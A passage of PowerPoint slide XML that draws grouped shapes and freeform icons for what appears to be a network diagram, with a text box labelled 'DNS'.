        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6073775" y="4348163"/>
            <a:ext cx="98425" cy="528637"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="62" cy="333"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185414" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA121C07-CA14-4762-AF78-9CFA5490394E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="2927780">
              <a:off x="-137" y="136"/>
              <a:ext cx="333" cy="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85415" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD062AC-18E5-4C3F-973E-2F3AAFCD714A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="7960739">
              <a:off x="-137" y="136"/>
              <a:ext cx="333" cy="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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="185353" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6662DCC1-91DF-4A64-BCD8-8DCF4CE4C349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3146425" y="5287963"/>
            <a:ext cx="441325" cy="701675"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="278" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185404" name="Freeform 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075C205E-A9B1-4375-BD77-478EB99D0E6C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="66"/>
              <a:ext cx="192" cy="376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 192 w 192"/>
                <a:gd name="T1" fmla="*/ 37 h 376"/>
                <a:gd name="T2" fmla="*/ 0 w 192"/>
                <a:gd name="T3" fmla="*/ 0 h 376"/>
                <a:gd name="T4" fmla="*/ 0 w 192"/>
                <a:gd name="T5" fmla="*/ 340 h 376"/>
                <a:gd name="T6" fmla="*/ 192 w 192"/>
                <a:gd name="T7" fmla="*/ 376 h 376"/>
                <a:gd name="T8" fmla="*/ 192 w 192"/>
                <a:gd name="T9" fmla="*/ 37 h 376"/>
                <a:gd name="T10" fmla="*/ 192 w 192"/>
                <a:gd name="T11" fmla="*/ 37 h 376"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 192"/>
                <a:gd name="T19" fmla="*/ 0 h 376"/>
                <a:gd name="T20" fmla="*/ 192 w 192"/>
                <a:gd name="T21" fmla="*/ 376 h 376"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="192" h="376">
                  <a:moveTo>
                    <a:pt x="192" y="37"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="37"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="6A9A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05" name="Freeform 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37D89FD3-2A51-4DC3-BA3E-BF345B53A73D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="192" y="37"/>
              <a:ext cx="86" cy="405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 86"/>
                <a:gd name="T1" fmla="*/ 66 h 405"/>
                <a:gd name="T2" fmla="*/ 86 w 86"/>
                <a:gd name="T3" fmla="*/ 0 h 405"/>
                <a:gd name="T4" fmla="*/ 86 w 86"/>
                <a:gd name="T5" fmla="*/ 340 h 405"/>
                <a:gd name="T6" fmla="*/ 0 w 86"/>
                <a:gd name="T7" fmla="*/ 405 h 405"/>
                <a:gd name="T8" fmla="*/ 0 w 86"/>
                <a:gd name="T9" fmla="*/ 66 h 405"/>
                <a:gd name="T10" fmla="*/ 0 w 86"/>
                <a:gd name="T11" fmla="*/ 66 h 405"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 86"/>
                <a:gd name="T19" fmla="*/ 0 h 405"/>
                <a:gd name="T20" fmla="*/ 86 w 86"/>
                <a:gd name="T21" fmla="*/ 405 h 405"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="86" h="405">
                  <a:moveTo>
                    <a:pt x="0" y="66"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="86" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ADCA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06" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192BC1E2-8F21-45DF-8290-2FA1AB3FBF2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="278" cy="103"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 192 w 278"/>
                <a:gd name="T1" fmla="*/ 103 h 103"/>
                <a:gd name="T2" fmla="*/ 0 w 278"/>
                <a:gd name="T3" fmla="*/ 66 h 103"/>
                <a:gd name="T4" fmla="*/ 90 w 278"/>
                <a:gd name="T5" fmla="*/ 0 h 103"/>
                <a:gd name="T6" fmla="*/ 278 w 278"/>
                <a:gd name="T7" fmla="*/ 37 h 103"/>
                <a:gd name="T8" fmla="*/ 192 w 278"/>
                <a:gd name="T9" fmla="*/ 103 h 103"/>
                <a:gd name="T10" fmla="*/ 192 w 278"/>
                <a:gd name="T11" fmla="*/ 103 h 103"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 278"/>
                <a:gd name="T19" fmla="*/ 0 h 103"/>
                <a:gd name="T20" fmla="*/ 278 w 278"/>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78" h="103">
                  <a:moveTo>
                    <a:pt x="192" y="103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="103"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CCDEC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07" name="Freeform 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A9095C7-84C3-4E94-A678-1D212B6C8998}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="21" y="86"/>
              <a:ext cx="147" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 147 w 147"/>
                <a:gd name="T1" fmla="*/ 29 h 62"/>
                <a:gd name="T2" fmla="*/ 0 w 147"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 147"/>
                <a:gd name="T5" fmla="*/ 33 h 62"/>
                <a:gd name="T6" fmla="*/ 147 w 147"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 147 w 147"/>
                <a:gd name="T9" fmla="*/ 29 h 62"/>
                <a:gd name="T10" fmla="*/ 147 w 147"/>
                <a:gd name="T11" fmla="*/ 29 h 62"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 147"/>
                <a:gd name="T19" fmla="*/ 0 h 62"/>
                <a:gd name="T20" fmla="*/ 147 w 147"/>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47" h="62">
                  <a:moveTo>
                    <a:pt x="147" y="29"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="2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08" name="Freeform 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E88C2A-E2EA-4824-A576-0E5CE0F2DC82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="54" y="123"/>
              <a:ext cx="192" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 192"/>
                <a:gd name="T1" fmla="*/ 176 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 192"/>
                <a:gd name="T3" fmla="*/ 209 h 209"/>
                <a:gd name="T4" fmla="*/ 159 w 192"/>
                <a:gd name="T5" fmla="*/ 193 h 209"/>
                <a:gd name="T6" fmla="*/ 159 w 192"/>
                <a:gd name="T7" fmla="*/ 21 h 209"/>
                <a:gd name="T8" fmla="*/ 192 w 192"/>
                <a:gd name="T9" fmla="*/ 0 h 209"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 192"/>
                <a:gd name="T16" fmla="*/ 0 h 209"/>
                <a:gd name="T17" fmla="*/ 192 w 192"/>
                <a:gd name="T18" fmla="*/ 209 h 209"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="192" h="209">
                  <a:moveTo>
                    <a:pt x="0" y="176"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="134" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192"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09" name="Freeform 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{797DD733-C71C-49A0-956F-0FCF5FE055B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="237" y="111"/>
              <a:ext cx="29" cy="28"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 29"/>
                <a:gd name="T1" fmla="*/ 12 h 28"/>
                <a:gd name="T2" fmla="*/ 4 w 29"/>
                <a:gd name="T3" fmla="*/ 4 h 28"/>
                <a:gd name="T4" fmla="*/ 17 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 25 w 29"/>
                <a:gd name="T7" fmla="*/ 4 h 28"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 12 h 28"/>
                <a:gd name="T10" fmla="*/ 25 w 29"/>
                <a:gd name="T11" fmla="*/ 24 h 28"/>
                <a:gd name="T12" fmla="*/ 17 w 29"/>
                <a:gd name="T13" fmla="*/ 28 h 28"/>
                <a:gd name="T14" fmla="*/ 4 w 29"/>
                <a:gd name="T15" fmla="*/ 24 h 28"/>
                <a:gd name="T16" fmla="*/ 0 w 29"/>
                <a:gd name="T17" fmla="*/ 12 h 28"/>
                <a:gd name="T18" fmla="*/ 0 w 29"/>
                <a:gd name="T19" fmla="*/ 1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12"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="24"/>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10" name="Freeform 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C488CC9A-7862-495A-A747-D242D9247D6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="241" y="172"/>
              <a:ext cx="29" cy="29"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 29"/>
                <a:gd name="T1" fmla="*/ 17 h 29"/>
                <a:gd name="T2" fmla="*/ 5 w 29"/>
                <a:gd name="T3" fmla="*/ 4 h 29"/>
                <a:gd name="T4" fmla="*/ 17 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 29"/>
                <a:gd name="T6" fmla="*/ 25 w 29"/>
                <a:gd name="T7" fmla="*/ 4 h 29"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 17 h 29"/>
                <a:gd name="T10" fmla="*/ 25 w 29"/>
                <a:gd name="T11" fmla="*/ 25 h 29"/>
                <a:gd name="T12" fmla="*/ 17 w 29"/>
                <a:gd name="T13" fmla="*/ 29 h 29"/>
                <a:gd name="T14" fmla="*/ 5 w 29"/>
                <a:gd name="T15" fmla="*/ 25 h 29"/>
                <a:gd name="T16" fmla="*/ 0 w 29"/>
                <a:gd name="T17" fmla="*/ 17 h 29"/>
                <a:gd name="T18" fmla="*/ 0 w 29"/>
                <a:gd name="T19" fmla="*/ 1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17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5"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11" name="Freeform 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879A7416-7F1B-43B1-BBCF-59527427195D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="54" y="180"/>
              <a:ext cx="200" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 200"/>
                <a:gd name="T1" fmla="*/ 181 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 200"/>
                <a:gd name="T3" fmla="*/ 209 h 209"/>
                <a:gd name="T4" fmla="*/ 200 w 200"/>
                <a:gd name="T5" fmla="*/ 168 h 209"/>
                <a:gd name="T6" fmla="*/ 200 w 200"/>
                <a:gd name="T7" fmla="*/ 0 h 209"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 60000 65536"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 0 h 209"/>
                <a:gd name="T14" fmla="*/ 200 w 200"/>
                <a:gd name="T15" fmla="*/ 209 h 209"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T8">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T9">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T10">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T12" t="T13" r="T14" b="T15"/>
              <a:pathLst>
                <a:path w="200" h="209">
                  <a:moveTo>
                    <a:pt x="0" y="181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="134" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200"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12" name="Freeform 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6585231E-4A9C-4945-AB95-D5393C1A40FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="37" y="344"/>
              <a:ext cx="33" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 33"/>
                <a:gd name="T1" fmla="*/ 17 h 33"/>
                <a:gd name="T2" fmla="*/ 4 w 33"/>
                <a:gd name="T3" fmla="*/ 4 h 33"/>
                <a:gd name="T4" fmla="*/ 17 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 33"/>
                <a:gd name="T6" fmla="*/ 29 w 33"/>
                <a:gd name="T7" fmla="*/ 4 h 33"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 17 h 33"/>
                <a:gd name="T10" fmla="*/ 29 w 33"/>
                <a:gd name="T11" fmla="*/ 29 h 33"/>
                <a:gd name="T12" fmla="*/ 17 w 33"/>
                <a:gd name="T13" fmla="*/ 33 h 33"/>
                <a:gd name="T14" fmla="*/ 4 w 33"/>
                <a:gd name="T15" fmla="*/ 29 h 33"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 17 h 33"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>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17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="29"/>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413" name="Freeform 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA8DA080-28D7-4578-82C3-A645A816C18E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="37" y="283"/>
              <a:ext cx="33" cy="37"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 33"/>
                <a:gd name="T1" fmla="*/ 20 h 37"/>
                <a:gd name="T2" fmla="*/ 4 w 33"/>
                <a:gd name="T3" fmla="*/ 4 h 37"/>
                <a:gd name="T4" fmla="*/ 17 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 37"/>
                <a:gd name="T6" fmla="*/ 29 w 33"/>
                <a:gd name="T7" fmla="*/ 4 h 37"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 20 h 37"/>
                <a:gd name="T10" fmla="*/ 29 w 33"/>
                <a:gd name="T11" fmla="*/ 33 h 37"/>
                <a:gd name="T12" fmla="*/ 17 w 33"/>
                <a:gd name="T13" fmla="*/ 37 h 37"/>
                <a:gd name="T14" fmla="*/ 4 w 33"/>
                <a:gd name="T15" fmla="*/ 33 h 37"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 20 h 37"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>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7"/>
                <a:gd name="T32" fmla="*/ 33 w 33"/>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7">
                  <a:moveTo>
                    <a:pt x="0" y="20"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="33"/>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85354" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BDBB595-8366-40BA-8AEB-B77DAC1140FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="5943600"/>
            <a:ext cx="6937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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185355" name="Text Box 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38C24E52-6A6E-4B78-960F-623009AE93E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3725863" y="5943600"/>
            <a:ext cx="693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400" b="1">
